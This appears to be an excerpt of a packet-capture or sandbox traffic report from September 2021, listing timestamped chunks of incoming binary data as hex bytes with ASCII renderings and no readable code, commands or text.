                                        2021-09-10 09:33:46 UTC85INData Raw: 17 ba 6d bb 65 76 e7 a0 8e 5f 7f 54 ca f2 7a 4b 5f 2c ac 4c 78 12 64 22 a9 14 8b 1e 49 da 54 f0 38 53 bb 68 e4 9f 06 a8 75 ad fa 45 66 cb 00 ff 00 91 bd 08 a1 cc fc 97 a4 7c ff 00 fd 42 96 93 3b 97 a3 8d b5 14 e7 a9 8e 47 6b 9a b1 fb 9d 3b 15 ce e5 85 9a 17 b1 fa 67 23 52 74 99 8a 81 cb 11 b7 6d 78 0e 6f 9e 3a fa 07 0b c3 29 48 2a 36 67 a9 c8 77 5d e3 e2 5c 74 cc 1c 42 c3 d0 13 43 76 ef 9c 1d e0 4f 94 d8 9e 9f c9 8f 96 95 57 b9 8d 90 19 5d 64 c1 c8 1d c4 d9 5f f3 36 b4 a8 5b 8b 04 f5 57 f5 04 61 05 3f a2 33 7b 5d 81 03 48 37 0e 71 82 13 4d 2a dd 32 d3 9d 2d 07 da de 59 d2 74 4e e4 58 64 c5 8f 92 f9 51 b4 65 6a 1c 7d 45 7b 13 26 e1 e0 45 90 88 f2 1a dd fa b4 05 df 55 dc 32 3e f2 8e 2a 61 24 73 cd ea c4 0b 3e ba c3 7c 47 fc 29 05 9d d2 2d 5a ab df d0 42 bb
                                        Data Ascii: mev_TzK_,Lxd"IT8ShuEf|B;Gk;g#Rtmxo:)H*6gw]\tBCvOW]d_6[Wa?3{]H7qM*2-YtNXdQej}E{&EU2>*a$s>|G)-ZB
                                        2021-09-10 09:33:46 UTC86INData Raw: 3f 92 fe 91 5e f5 56 2f a7 e2 64 a4 c6 59 23 ca db db 71 b5 96 c9 04 31 6b ab 36 7f b7 f7 eb c1 0a d0 0e bf 88 61 0b 0d 7a 65 4b 54 f5 8d 4d 6b 55 0f 82 d1 a0 45 95 b0 f0 61 5b 51 fb c3 bd af 37 64 92 05 71 e2 fa 90 46 b6 ad 35 a7 3f dc 16 0a bd 07 3b c3 85 a9 cf f6 95 24 3a 63 18 a5 36 23 76 10 90 18 59 34 56 d8 90 2f dc 2c fc f4 39 f2 c9 53 11 57 14 cf 4d 3d 8d b5 86 e5 28 03 34 6c 2d 52 ec 1f bd e0 4b 1f 10 49 26 89 31 3b d6 5c cd 4d 26 76 dc 01 c9 9a 78 e4 0a c4 1e 43 28 92 8f 8e 07 cf 5d aa 15 25 29 34 62 ef 77 71 7f 78 94 af f9 10 4d 5d 21 58 8b 75 35 f2 ee f1 3e 9e d3 e4 59 fd 4d de ff 00 88 86 2d 76 2c cc 70 90 ef 30 c6 00 c5 9e 03 c0 04 50 00 0b b2 0f 9e 3a 3c ec 2b 09 09 3e 20 52 4b 64 c1 cd f5 2f 95 8f 48 5a 48 61 34 3d 94 f4 cd 81 71 d0 f6 21
                                        Data Ascii: ?^V/dY#q1k6azeKTMkUEa[Q7dqF5?;$:c6#vY4V/,9SWM=(4l-RKI&1;\M&vxC(]%)4bwqxM]!Xu5>YM-v,p0P:<+> RKd/HZHa4=q!
                                        2021-09-10 09:33:46 UTC88INData Raw: 7a c1 26 91 00 7c b9 a2 2e 28 c9 bc 17 f7 28 8d 19 bb 8c 1a 85 3e ea db c7 b1 4d 1b 3c f4 29 89 0a 25 f2 7f cf 3b 88 97 06 86 0b 56 97 ad ad 6d 68 47 ad 21 fb f4 f6 73 1e 3c b8 e3 14 9d ee 63 fb 92 f4 b2 e3 d9 65 51 dc 0c 55 49 b2 a5 00 61 e0 9e 91 9c 54 41 4a 32 d3 96 9d e6 2c ed a2 92 87 4a 14 d5 70 68 72 1e ee 6b 6f 37 8b 79 e9 26 82 1c 49 1d 12 79 69 6e 57 0c d1 a4 a4 a0 20 2c 6e 48 75 8f 85 be 01 3e 47 3d 2a 99 93 11 2e bb 7e c9 af 3e cc 38 25 63 5b 2d 86 ae 91 4e ac 6f 5b 7c 43 6f 48 d5 d5 42 a7 71 e4 99 31 e1 c7 5d cd 6f 0e 38 05 86 3c 69 fb 51 5d db 73 57 24 00 2f 8e 17 54 ec 42 b4 cc fe cb f7 bc 48 70 08 0a 2a 20 54 f8 9b bd 6b bd 35 11 27 95 a8 5a ce 72 7b 91 62 1e d3 31 61 51 c9 b8 1d fb 02 92 43 ab f0 42 9e 47 91 5d 2c a5 2d 4a 2c 29 4a 81 4d
                                        Data Ascii: z&|.((>M<)%;VmhG!s<ceQUIaTAJ2,Jphrko7y&IyinW ,nHu>G=*.~>8%c[-No[|CoHBq1]o8<iQ]sW$/TBHp* Tk5'Zr{b1aQCBG],-J,)JM
                                        2021-09-10 09:33:46 UTC89INData Raw: f4 31 5b 3e a6 a4 2d 0b cf 1c 8a d5 99 1d 30 0c 03 89 ad 9c b3 0b f7 0a 3e db a2 47 23 e7 ab 2e 1a 64 c7 47 3d 0b 38 0e 5a bc dc 6b 94 52 71 32 98 39 b3 dd b6 7e b4 ee 82 39 a3 fd 52 4d 8f ff 00 ba 3a e4 83 76 d9 70 9b 0d 0a 8d b4 ea 43 5b 6e f2 de dd db 7e 48 af 06 fa d3 7d 1c 28 f1 04 ff 00 ec 31 75 23 5f 5b fb 18 c0 ff 00 a8 52 d2 27 91 a1 16 17 7b de 38 a3 ac b2 3e 66 5e 46 a3 26 c8 17 2f 05 db c8 9b 1d 91 3b 69 90 07 00 0e eb 47 6a 0f 25 b8 eb ea 7c 1f fe 01 c8 7b 6d f8 7a f2 8f 83 7d 4c 7f f9 2b ff 00 d8 b7 b7 6e e4 0b 9b 18 78 fa 47 2e 4d 70 62 18 25 8a 29 65 c9 97 38 b4 a5 14 2c 72 a8 59 a2 8b 70 20 d4 80 b5 82 36 86 16 3c f5 51 c7 4b 25 58 cb 80 69 d6 9e bf 8a de 19 e0 70 0f f8 f5 e5 73 cf f1 ca 1a de a3 d3 31 f1 74 0c ad 33 25 ae 71 3c b1 24 72
                                        Data Ascii: 1[>-0>G#.dG=8ZkRq29~9RM:vpC[n~H}(1u#_[R'{8>f^F&/;iGj%|{mz}L+nxG.Mpb%)e8,rYp 6<QK%Xips1t3%q<$r
                                        2021-09-10 09:33:46 UTC90INData Raw: 16 1b 37 97 3d c7 50 d4 1c 03 64 8a f3 63 e7 a5 26 91 85 46 d4 38 72 3e 95 e6 7c e1 be 1c 35 4d 85 e8 ee 0b 54 eb d1 fd 1a 39 55 ea dc ec c7 8f 20 81 db 96 0c 77 0b 90 ac 41 91 9c d1 0a ab e4 b8 f0 09 a1 c8 1f 8e 96 40 04 92 76 af 53 5f 7e 70 f6 10 a1 40 08 be 80 75 3a 79 c2 47 39 b5 36 83 4b c4 fb 72 c8 f3 19 5b de 37 92 c4 3a 96 b1 7b 48 b2 41 f8 e4 0f cb 38 51 ff 00 6f 51 6e f2 f5 88 a1 24 52 e4 e5 a7 79 e5 eb 1a 19 03 74 b8 a5 20 63 f7 59 cf 1c c9 b8 38 0d 8e 0c 81 b7 0f 70 45 f1 63 e7 a1 90 c4 88 72 5a 01 b9 39 0b db f5 dd 21 af e9 3d 99 58 19 d8 b8 bb 22 92 3d 03 52 c8 9d e5 6a 8c 49 b6 40 89 1f 20 31 09 1b 3a d9 f2 4a 8a 3c 74 15 93 89 de b4 cc bd a1 85 27 09 a6 62 bb ed 93 f7 94 2e 3d 31 38 97 44 c5 70 64 90 60 6a 53 e6 8f 6b d3 bf dc 4b ec 1b 8d
                                        Data Ascii: 7=Pdc&F8r>|5MT9U wA@vS_~p@u:yG96Kr[7:{HA8QoQn$Ryt cY8pEcrZ9!=X"=RjI@ 1:J<t'b.=18Dpd`jSkK
                                        2021-09-10 09:33:46 UTC91INData Raw: 24 82 01 36 60 49 ce fe df 3a c5 62 f5 26 58 95 4a 11 1c aa 52 54 70 58 92 e0 31 dc 79 34 49 00 a9 be 6f e3 8a ea c2 51 25 40 3d 01 1d 0b 8f 88 cf 71 48 20 e2 2c 41 06 9b df d9 b9 42 83 ee 71 de 3e c6 2e 69 85 e1 49 0f 6a e4 13 39 3e e8 63 45 a2 37 2b 01 b5 89 da f4 40 6a be ae 10 82 12 93 71 6f 4a 36 6f ae b6 ca 29 e7 28 36 01 46 2e 58 33 fa 55 b9 fb 41 6e 8b 92 b2 3f 7e 4f f9 9d 95 09 23 1a 66 66 a1 91 be 20 6f 79 72 6d 54 55 03 bb c0 e8 53 95 85 9f 3b 83 9b 38 eb b4 39 c2 0f 05 9d c6 83 51 e7 4f d4 58 3f 47 66 0c 65 c5 80 6e 57 99 6a 10 48 3b 42 8d 8e e1 0f 04 3d 58 04 58 ab fe 3a 49 4b 42 42 88 00 12 0d 43 27 2e 4f ee ef e7 a9 e0 65 a9 69 49 c0 3c 21 ed 98 af 3b 31 ac 5b 0f 4f 66 ce d8 eb 0c 72 45 24 51 20 b7 25 95 a4 3b 40 b0 14 59 27 f0 38 3b 7e 7c
                                        Data Ascii: $6`I:b&XJRTpX1y4IoQ%@=qH ,ABq>.iIj9>cE7+@jqoJ6o)(6F.X3UAn?~O#ff oyrmTUS;89QOX?GfenWjH;B=XX:IKBBC'.OeiI<!;1[OfrE$Q %;@Y'8;~|
                                        2021-09-10 09:33:46 UTC93INData Raw: 40 e7 34 47 7b 4e c1 48 f6 b1 57 1b 36 8a 31 1e 39 dc 36 80 08 bb 62 07 4a 97 b1 cb 28 3a 52 5e b6 19 1b 1e 50 bb d5 0c 84 cc a6 6d d0 ce ed 3c 72 95 02 bc 95 42 c4 d0 2c 3c 8a ff 00 b7 9e a4 87 0e 03 74 ef f0 1e 38 bc 26 98 43 8d 45 b3 ef da 15 da 94 84 ef 62 c2 46 21 a9 fc 6f d8 a7 86 af e2 c0 51 5b 88 e4 d1 ea 4b a2 69 4a 8d 87 c7 37 db 5a 42 cb 48 00 02 c6 ec 76 f2 a7 9e 7e 55 df ea 13 40 34 f9 dd 51 da 08 a6 8c 3a 23 52 99 d4 35 6d 0c 2c b0 06 f8 6b ab af 07 a7 b8 47 52 a5 87 37 60 e5 da 9d 62 87 8c ff 00 21 90 c4 c3 2b 65 5d c9 8e 5d 7f 53 d2 98 7d 07 9f 34 80 48 cd a9 48 c1 64 f6 c7 1a cb be 08 c0 a3 64 96 75 2b c9 24 82 39 f1 d6 bf e9 28 3f ee 33 62 a1 41 a3 d0 fc 01 af 28 f9 d7 fa 8e 60 1c 3c f7 ff 00 a9 a9 ad 41 0c d6 d1 8f f6 dc 53 f5 9c 1d dd
                                        Data Ascii: @4G{NHW6196bJ(:R^Pm<rB,<t8&CEbF!oQ[KiJ7ZBHv~U@4Q:#R5m,kGR7`b!+e]]S}4HHddu+$9(?3bA(`<AS
                                        2021-09-10 09:33:46 UTC94INData Raw: d1 10 08 aa aa 0b 1a 5f 7f 8f cc 2e 52 18 e2 1e 2f 11 bb 6b 97 6d 18 61 2e b2 b3 cb 4a 03 10 89 f0 cb f8 26 bc f1 c0 f6 f4 45 10 4b 8c ff 00 af 88 e4 a5 2c 5b 53 56 f4 bb 59 a9 5e b1 f7 29 a2 40 d9 4f 68 12 2b 23 77 00 f8 1b 79 f2 7f f5 f3 d2 cb 3e 36 26 c2 83 c8 fb 8a 69 58 2b 82 f4 25 44 e4 69 5d b3 ad b9 73 80 3d 52 53 ab 66 61 98 e3 63 89 0b 96 99 de c0 7a 4b 0a a7 81 ed 24 9b 1c 1a 15 d0 97 6e bf 06 0b 2d 2a 49 c5 4a 86 eb 7a 9b 7a d1 b4 8a c7 f5 8f 52 4c 6f 47 ea b8 21 81 4c 9c b9 e0 8b 77 20 3a ca c6 5b 1f e6 e3 81 c0 b3 5c 5f 4b cc 4a 48 ad ce 5d db bd dd c9 04 e1 23 2e fe 47 a7 38 e5 b6 b9 31 9b 51 d4 a3 57 a8 a1 88 aa ef dc 17 79 7f 71 16 76 f0 00 fe c7 a0 e1 01 db 3d cf a5 cf 74 10 e2 09 09 1b d0 8b e7 01 92 05 86 6c 52 e5 5d a3 82 49 05 fc 30
                                        Data Ascii: _.R/kma.J&EK,[SVY^)@Oh+#wy>6&iX+%Di]s=RSfaczK$n-*IJzzRLoG!Lw :[\_KJH]#.G81QWyqv=tlR]I0
                                        2021-09-10 09:33:46 UTC95INData Raw: ca 76 b0 7e 08 03 6d ef 55 b2 39 a2 c0 0b a1 d7 42 c6 77 f7 1d fe a1 29 a5 4c 49 b3 1b 0a 9a 73 71 ef 4c e0 3f 58 d3 a5 0b 27 69 54 ac 9b ed a3 91 23 2b 64 09 00 04 1b 61 c9 57 6b f8 5e a7 a7 e7 b7 ee 9a 04 4f 49 1e 2c 45 54 00 9a fb 79 36 50 88 f5 9e 24 58 f8 45 60 6b 40 b3 86 90 2e d7 ef 48 ac 63 72 00 36 e1 ff 00 e6 a9 e1 89 2e b5 75 d7 bb 1d 8f 2f ce 6a 4c 23 c5 7b 68 5f bb 76 5a 28 ef ad 75 4c 8d 38 49 87 39 51 95 1b 49 2f ed b4 9d a4 2c e2 44 71 41 6c 5e e0 dc 03 fd fa b0 e0 c0 5b e3 16 29 a8 a0 0c 32 19 f9 3e ae 2d 9e e3 66 a8 a9 94 28 02 98 8d 3e 5b 9c 28 b4 2c 8c 8c cc 89 32 de 19 c8 57 68 d9 22 a7 65 40 6d 64 26 41 4c 43 0e 08 26 b9 db 55 d5 f2 0a 68 12 2c 28 69 ca ef 14 0a 1e 35 17 d6 9d 61 a7 e9 f5 77 3d f8 dd c4 4c f2 15 45 0b ec 75 93 6b b2
                                        Data Ascii: v~mU9Bw)LIsqL?X'iT#+daWk^OI,ETy6P$XE`k@.Hcr6.u/jL#{h_vZ(uL8I9QI/,DqAl^[)2>-f(>[(,2Wh"e@md&ALC&Uh,(i5aw=LEuk
                                        2021-09-10 09:33:46 UTC96INData Raw: 11 46 0c f1 64 12 a7 73 6d a6 22 ac 28 37 5e 47 49 cd 94 92 97 c4 c4 b5 ed d0 3b 3f 9f b0 8b b9 53 57 84 02 9c 44 e4 cc 4b 1c f4 0f e7 58 5e 6a 78 d2 36 f7 dc 7b ce 4c 92 28 3b 98 a1 e1 77 29 e6 81 2a 41 aa 00 93 e7 aa ce 26 5a 81 18 66 a5 89 62 96 0f fa d3 dc 18 b3 e1 54 a5 38 54 b2 18 53 50 db f4 7c b3 80 dc a6 96 23 2c 53 a4 7b 51 95 48 f2 0a 3a 6d 0e a4 f0 2c 9a a0 78 e4 f9 ae 97 52 51 87 09 d2 8c 58 9e da 9d 77 77 d0 01 2e 9a 38 b9 d9 af d4 0b 7a e6 27 92 a0 46 16 18 fb 81 98 c5 24 6c e1 b6 98 cd ef 5b 1f e5 17 fe a3 fd 7a 50 dc b5 b2 83 c2 e7 5c 78 e1 12 42 23 68 f7 6f a6 0c 64 b5 56 fd ea bc 95 00 5d 81 cf 37 e0 74 44 a4 10 ee 5c ef d2 06 ba a8 93 73 c8 39 67 3e e3 d7 68 51 ea 84 77 66 88 b0 25 a3 32 0b 6d aa 80 29 a2 fb 79 6b 04 5e ce 0d 1e 7e 7a
                                        Data Ascii: Fdsm"(7^GI;?SWDKX^jx6{L(;w)*A&ZfbT8TSP|#,S{QH:m,xRQXww.8z'F$l[zP\xB#hodV]7tD\s9g>hQwf%2m)yk^~z
                                        2021-09-10 09:33:46 UTC98INData Raw: c1 1d 70 09 80 30 a7 91 f9 f9 8e 94 83 71 ea 63 fa 37 42 77 04 bd aa 48 e4 1f 1b 97 77 06 85 73 5f ef fd ba d3 23 f9 0a bd ed c8 f3 8c 19 9a 40 70 9a 8d ff 00 51 95 98 ed dd be c2 95 b1 cf b8 1f c5 5f cd 78 e0 d8 e7 9a e8 aa 0e c7 fe ae 79 c7 90 4d 54 d6 49 24 75 cc df e6 3f 40 8e d2 f7 37 28 b6 06 bc 2e d3 c7 02 f8 3f 9f e7 c0 eb c9 38 83 b0 1e ba 66 c3 db 4d 23 a2 67 fe b9 6a 74 e5 d7 4e 91 35 1c a5 57 dc 96 c7 da 0f 36 07 9b ae 6f f8 23 e2 bf d3 a9 0c 4b 92 a7 2e c7 2d a9 02 23 ee 95 17 c3 85 e8 ce ed d4 77 a4 7a 60 d2 15 50 2f c9 1c f0 6f 81 63 e0 7c 9b 3f 1c f5 35 65 46 a7 c9 fe fa c7 91 72 15 60 d5 19 d0 5f e5 9e 91 0f a8 b9 c8 49 20 56 51 12 b6 d6 ab f7 39 ad c9 63 e0 d1 a3 c0 15 d2 93 47 8b 16 8d 4f 28 20 9a 92 e0 00 5a 97 88 ec c5 45 c3 8a 38 e9
                                        Data Ascii: p0qc7BwHws_#@pQ_xyMTI$u?@7(.?8fM#gjtN5W6o#K.-#wz`P/oc|?5eFr`_I VQ9cGO( ZE8
                                        2021-09-10 09:33:46 UTC99INData Raw: 63 20 6d 61 cd f9 be 83 30 21 40 24 cc 63 71 40 4d f6 3e 8c 6e d0 e4 8f ba 80 71 4b 7b 97 a8 03 2a 33 39 06 d6 f3 82 9d 06 7c 98 a5 94 34 9f 70 ae c1 62 8d cc 71 85 45 45 42 a8 47 b5 85 02 41 35 f3 67 a2 01 84 21 2c ed 99 19 73 b3 8e f2 85 a7 f8 b1 39 09 ab d6 c1 c5 bd 62 7b 23 37 11 27 89 e4 a5 93 ff 00 86 01 b7 57 3c 16 da 01 03 9f 68 b3 64 7b 88 ae 87 88 99 89 05 2e 01 35 cc b5 47 b7 bb 08 12 10 a1 2c 84 9d 3c 54 73 5d 01 6a f3 de 91 ed 32 d9 d6 4e d6 d8 94 39 55 12 c6 1a c5 d3 30 7b e0 31 fd b7 76 2f 9a f2 55 f8 87 fd 5b 21 9b 6b df 47 85 94 a5 12 52 a7 24 58 59 cd bf 11 f9 65 73 24 72 b1 0c f1 36 e0 61 60 4a f9 1d be cb 50 fd c0 d9 5f 77 fd 35 d0 08 f0 b8 53 1d 1b 36 72 33 e4 f4 e7 11 9b 34 94 7d b2 9c 0e 2e 4f 6e ef eb 61 03 ba a3 c7 90 b2 b3 64 2a
                                        Data Ascii: c ma0!@$cq@M>nqK{*39|4pbqEEBGA5g!,s9b{#7'W<hd{.5G,<Ts]j2N9U0{1v/U[!kGR$XYes$r6a`JP_w5S6r34}.Onad*
                                        2021-09-10 09:33:46 UTC100INData Raw: 3e da 42 ef 47 d8 7e a9 58 64 2c 84 85 29 90 a2 ef 9f 46 a7 99 a7 94 63 c5 9a 6c 89 5c e5 05 06 48 d5 02 88 f7 c4 ac 28 85 06 c5 90 39 b1 44 ee 17 57 5d 72 52 14 a9 95 14 26 80 7c ed bf bc 06 62 d0 89 67 c4 c3 56 ce fd 1c f6 f5 89 49 e3 ed 46 69 23 66 48 e1 32 a4 92 84 2a 93 10 a1 16 02 41 91 6b de 42 ee a7 1c d0 3d 3f 32 4a 80 2a 49 21 39 0a 5a c5 8d 0f e2 d0 ac ae 21 25 40 e3 24 a8 ef f2 3d 4e 47 78 85 97 36 48 e3 9e 18 b7 47 91 0b 87 70 5d d9 65 8f 71 11 ee 83 85 8d 92 22 52 ff 00 cc a4 11 ee 17 d2 62 63 a1 52 c0 75 62 24 07 ca d6 e7 e5 ce 2c b0 25 53 10 bc 59 0a 1f 62 dc fe 2b 9a cb d4 cd 2a be 6f 6d a3 94 84 53 1a 4e 80 18 3b 81 59 a3 32 2b 37 7a d8 dc 4c eb c0 25 49 07 aa 89 df e5 e2 65 02 49 4b 58 12 d4 3c cd 4e 54 d8 46 a3 81 0a 02 58 48 a5 89 0f
                                        Data Ascii: >BG~Xd,)Fcl\H(9DW]rR&|bgVIFi#fH2*AkB=?2J*I!9Z!%@$=NGx6HGp]eq"RbcRub$,%SYb+*omSN;Y2+7zL%IeIKX<NTFXH
                                        2021-09-10 09:33:46 UTC101INData Raw: 59 52 61 65 6b 98 fa 4c 59 27 ed 26 c3 75 99 92 30 44 91 e4 ca f9 78 73 94 70 18 95 79 05 91 44 6c a2 02 b1 00 f3 52 52 82 6f d3 fb e5 41 43 15 7c 39 51 5b 3b 9a 90 18 97 6a ea 7e 32 88 39 64 c9 c0 68 0a 83 23 e3 e4 4f 8f db 60 50 3c 0c 40 74 6f 6f cb 0b 89 9b ca 92 a3 8e 7a e8 48 28 07 0b 9e 9d 58 7e 39 da 27 31 53 25 ad d5 40 48 0c 77 cd f5 77 89 0c a8 76 98 e0 da d1 ae 66 d7 fc 76 1d ff 00 e4 cd 18 e0 af 69 ff 00 d3 6d df f1 0c b0 bb 9a 83 7c fc f9 56 3c 3f f2 38 27 57 1e a1 fa b7 93 41 a6 9d 1c 5a 9e 9c 74 ac 89 63 94 77 02 62 97 66 2d 0e 7a 21 12 44 d7 b5 06 3e 6a 8d 80 1a 0a e1 4a d9 34 11 58 5c a5 9f fa 92 ed 97 7f d6 91 67 20 fd d0 65 a9 56 34 a5 73 b5 5b 97 c5 1f 1e 04 27 4e d2 1b 47 c9 c7 96 0c 9d 3e 47 98 63 be d6 7e d8 c9 44 55 50 3f 6e d0 cd
                                        Data Ascii: YRaekLY'&u0DxspyDlRRoAC|9Q[;j~29dh#O`P<@toozH(X~9'1S%@Hwwvfvim|V<?8'WAZtcwbf-z!D>jJ4X\g eV4s['NG>Gc~DUP?n
                                        2021-09-10 09:33:46 UTC103INData Raw: ba 21 92 ab fc df cf 46 c6 92 68 ee 48 6b 00 35 cf 5b 6d 11 12 92 e4 90 1f 5d a9 df ad eb 1a bf 54 a0 33 65 69 ba 9b ec ec f6 64 79 a4 1b 79 4c a4 a9 09 0b c5 ac d1 ed 2b b4 15 3e 6a f8 7f 82 99 87 ee 24 bf 88 96 02 a6 ed 4b d3 42 f9 6c f1 5b f5 07 0a 49 23 30 01 1a 1a 01 b7 79 45 a7 fe 96 b5 c7 3e 9a 8f 14 fb a4 c2 cc 65 50 94 de d7 bb 34 6b 6b d8 06 cd 70 28 13 c7 59 5f f5 24 9c 33 71 a5 25 94 90 41 e4 59 89 a9 fe a9 1b 1f f4 8c e6 46 17 66 52 9c 9b fe bd 4e 71 d2 9f 49 eb f1 a4 4b 34 c0 bc 52 04 86 58 98 03 4d da 05 de 44 20 5f 14 ab 63 e3 e4 75 8c 9b 2d 80 16 55 4b f3 1f 14 fd 47 d7 be 9b 3c a9 29 c4 a7 d8 b5 6b bd 9d b4 b5 9a d1 60 fd 2e c8 25 c6 78 a2 56 89 55 a4 04 37 ba a4 5b f7 c5 54 cd 43 8e 08 06 85 8e 7a 48 a0 80 49 a9 bd 34 f9 3d ed 1a 74 4c
                                        Data Ascii: !FhHk5[m]T3eidyyL+>j$KBl[I#0yE>eP4kkp(Y_$3q%AYFfRNqIK4RXMD _cu-UKG<)k`.%xVU7[TCzHI4=tL
                                        2021-09-10 09:33:46 UTC104INData Raw: db 20 28 b1 35 15 cf a8 2f e6 47 95 da 05 75 fc 2f 7c 99 2a 3f e1 e5 01 9e 56 91 99 bd a0 d2 c7 7b 77 10 cb 64 01 f2 7c 9e 83 f6 c2 c0 5a ea df c4 00 f6 eb d1 9d e1 a0 52 40 15 f0 e4 1b 3f e9 f9 56 d5 85 57 a9 60 9d e2 cc a7 ee 23 c4 24 5f 1b e3 05 29 64 5e 78 b2 2f 68 fc 59 ae 99 03 12 53 86 ce 28 69 fa ac 4b c2 1d 81 2e 0d 36 76 e7 4e b0 a5 8f 15 f1 75 4c 44 0b 1b 2a 4b 1c 72 c8 c0 06 91 b2 55 ce ea ff 00 c0 40 b6 e3 9f 8e 8c 83 46 cc bb 69 68 56 68 a1 2c f9 be 6f 61 df 3b b5 0a f1 b1 b7 ca 23 8a 16 21 77 21 95 c7 b4 06 2e 77 8b 5b 60 cd e3 9a ff 00 b5 47 ee 1c 45 39 d7 2f 9e ff 00 25 97 2d 78 01 35 61 99 a8 cb 96 c2 ba da b1 bb 8a d1 e9 39 11 4d 3e e9 4b 4e 51 d7 f5 15 49 24 00 cc 14 f8 1e d5 51 44 73 c8 3e 7a 10 01 4a 77 a5 1e ef ed d7 3b 47 27 48 c4
                                        Data Ascii: (5/Gu/|*?V{wd|ZR@?VW`#$_)d^x/hYS(iK.6vNuLD*KrU@FihVh,oa;#!w!.w[`GE9/%-x5a9M>KNQI$QDs>zJw;G'H
                                        2021-09-10 09:33:46 UTC105INData Raw: 12 01 a5 5e 99 1e 54 7e ad 1f 19 98 13 8a 76 37 aa d4 cd ce 8f 4a e5 6a 7b 42 cf d5 d8 8e b2 ea 3b 54 56 9f 85 0a a4 ca 76 95 8f 1b 86 75 1b 85 13 b9 f7 7c b1 0a 48 1d 5b 48 29 99 28 38 f0 86 35 6a 5d d8 97 a1 eb d6 f1 43 38 09 7c 45 49 bb 38 d7 cf cf 9b 5c 45 e4 fa 0d ea ff 00 b9 f4 bc 31 66 17 c9 9d b1 60 c2 27 b8 8c 11 55 0a e2 ce cb 25 01 de 8c 24 67 e5 58 75 89 fa c7 0e b1 39 4a 42 0b 63 2a 06 b6 7a 52 96 ae 47 36 ac 6f 3e 8b c4 20 c8 28 5a 9c 94 b5 1a bc c6 6d 5b e5 10 1e b3 c0 8f 42 f5 14 b9 5d e0 b8 f9 98 8b 93 01 8b 97 c6 d4 22 95 16 44 dc 08 52 b2 0d a4 d8 f1 f8 e2 c5 22 61 5c b0 8c 2a 0a 4d dc 30 cf 78 84 f9 48 97 34 a8 58 9e 5d d2 9f 11 0d af e5 e3 6f df 8e f2 49 79 65 90 4b 1e c0 d0 ea 58 cb 33 07 3c d0 19 0b 20 e0 d5 a8 af c0 3c b2 ea c3 50
                                        Data Ascii: ^T~v7Jj{B;TVvu|H[H)(85j]C8|EI8\E1f`'U%$gXu9JBc*zRG6o> (Zm[B]"DR"a\*M0xH4X]oIyeKX3< <P
                                        2021-09-10 09:33:46 UTC106INData Raw: fd bb 5f 2c a1 19 85 46 78 a5 1d f9 8a b6 86 9f bd 21 83 3a 43 85 a4 ac d1 7f f8 b7 58 62 f7 12 91 ed 92 30 cf b4 21 b3 b9 59 94 fc 6e e7 a4 d3 45 a9 2f e2 39 38 7c f7 b5 61 e5 02 50 95 b1 c2 12 1c e4 0e 8f 9d f9 e5 06 ff 00 4a f0 96 38 b5 e7 c9 41 2a 04 79 21 5b fd aa e8 c1 63 0a 6f 75 11 63 cf f6 3f 00 e2 8b a4 01 53 8b 2b fc f5 f7 a8 76 38 70 ac 81 70 f9 5d eb b7 79 bd e5 f1 71 a2 8a 75 ce 89 92 45 33 41 a6 6a 30 9b 0d 0c 13 c8 dd 9d a4 91 61 40 04 2d 56 d0 4f 04 73 e1 44 82 69 40 f4 6f cc 15 ea 75 b9 eb fd 40 fe a9 89 91 89 84 d9 78 6d ee c3 2b 7b 89 01 93 be c8 1c 0f fc 29 7c 78 35 d7 99 2a 15 53 0b 82 5a ed 6f ee b1 12 40 29 19 bf eb e5 ba c0 fc f8 c3 23 40 c9 cb ee 26 ff 00 f8 90 ea 8a a1 55 83 89 eb b7 47 dc c8 ce 49 22 8d 8e b8 95 11 31 08 48 70
                                        Data Ascii: _,Fx!:CXb0!YnE/98|aPJ8A*y![couc?S+v8pp]yquE3Aj0a@-VOsDi@ou@xm+{)|x5*SZo@)#@&UGI"1Hp
                                        2021-09-10 09:33:46 UTC108INData Raw: 15 40 18 ab 79 6b 25 81 73 fb 89 00 0a eb 37 c4 4c 23 16 65 d8 6b 7b 59 86 5e 51 b4 fa 5a 41 52 d5 7b 33 0a 13 e5 a3 db 20 6b 94 5c df a6 68 34 f8 7f 5b 19 19 a7 c8 86 18 e5 2a d2 3e 34 2c c1 1c d5 13 db da cd ee a3 5b 89 eb d2 8b b0 5d 1d af bd df ce a2 be 91 6f 3a 50 5c b5 29 26 a9 49 55 ea 30 82 6b 51 7b 73 3a 52 2e 66 8f e9 f8 a4 ce d3 22 8d d6 55 c9 c7 c6 7e cc 7f a2 44 50 52 18 e3 69 02 b2 f6 d5 77 8e e2 2f 70 29 20 f3 d5 ac 9e 05 0a 9a 06 27 4e b9 56 83 4d de 8c 3c 9f 1d 3f 8d 9b 2a 5c d5 b2 92 e0 80 75 ea 7b cd cd 89 96 bf e9 4c 28 97 1f 0f 1d c3 4e 76 e7 b6 4c 52 07 5c c8 32 01 8b 19 25 8f 73 08 e6 0c 26 33 ae e2 0a 88 de 86 ee 9b e2 7e 9f 2d b0 ca 62 a6 1f c7 7d 7e 2d ed 15 3f 4d e3 e6 2a 7a a6 cd 74 a5 3f f6 76 0d bb 3e ec da d4 d6 17 d9 de 97
                                        Data Ascii: @yk%s7L#ek{Y^QZAR{3 k\h4[*>4,[]o:P\)&IU0kQ{s:R.f"U~DPRiw/p) 'NVM<?*\u{L(NvLR\2%s&3~-b}~-?M*zt?v>
                                        2021-09-10 09:33:46 UTC109INData Raw: 0f 76 7b c7 26 55 b0 d4 0c c6 cc 21 59 a8 ea 11 bc 39 0f b4 ed 59 a7 23 76 eb 05 47 bc 2f c4 6b 28 06 db dc 4d 90 39 3d 4d 0e c6 fb 7e be 7d 63 d8 88 f0 b5 b0 f3 b5 f4 a3 fe e1 37 ae 32 16 76 1e dc 61 bd 88 76 3b 56 36 e0 90 f7 65 03 10 68 0b f2 4f 37 d4 50 19 75 a3 9c f4 66 7f 38 4b 8b 25 48 21 bc 4d 60 e0 dc 77 5f 76 8a d9 f5 15 95 a0 7c 84 31 84 2b 34 25 46 e6 df 21 0b c9 b3 4a 3c ed 6f 26 fe 7a bc e1 70 85 a1 49 20 b1 18 88 36 1a 9c f6 8c 97 d4 54 91 29 89 09 38 8f 87 47 1d d6 db 0c f9 f5 f5 e7 19 8f a4 f5 1b 45 58 d3 48 c8 b5 b3 68 ee fe d5 53 44 37 b7 9b e0 0b 1f 23 ad 47 d3 14 7f dc eb 76 ad c0 d8 5d be 74 8f 9b 7d 58 ff 00 c1 c4 56 e9 b5 72 50 d3 cb b6 3c c0 c9 c4 84 e0 e1 5d c1 b5 b3 4b 12 ab 4e eb be 52 8d 64 0d ee a9 18 56 f0 dc 7e 3a de 25 6f
